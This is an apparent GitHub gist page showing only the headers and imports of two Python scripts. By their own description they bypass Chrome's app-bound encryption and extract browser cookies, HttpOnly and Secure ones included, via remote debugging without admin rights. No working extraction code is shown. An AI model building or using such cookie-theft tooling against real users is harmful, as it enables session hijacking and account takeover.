This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Bypass Chrome v20 appbound encryption and extract cookies using Chrome Remote Debugging without admin rights. | |
| Including HTTP Only and Secure cookies. | |
| Developed by: github.com/thewh1teagle | |
| License: MIT | |
| For educational purposes only. | |
| Usage: | |
| pip install websocket-client requests | |
| python main.py |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| pip install pywin32 pycryptodome | |
| python main.py | |
| """ | |
| import ctypes, win32api, win32con, win32security, win32crypt, win32process | |
| from ctypes import wintypes | |
| import os, json, binascii, sqlite3, pathlib | |
| from Crypto.Cipher import AES | |